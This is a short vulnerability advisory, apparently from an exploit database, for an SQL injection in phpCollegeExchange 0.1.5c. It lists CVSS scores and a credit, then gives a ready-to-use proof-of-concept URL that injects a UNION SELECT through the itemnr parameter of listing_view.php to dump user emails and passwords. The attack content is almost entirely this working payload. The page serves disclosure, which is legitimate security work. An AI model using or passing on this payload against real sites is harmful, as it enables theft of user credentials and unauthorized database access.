phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln

2009.06.20
Credit: SirGod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability [+] Discovered By SirGod [+] www.mortal-team.org [+] Script homepage : http://phpcollegeex.sourceforge.net/ [+] SQL Injection http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top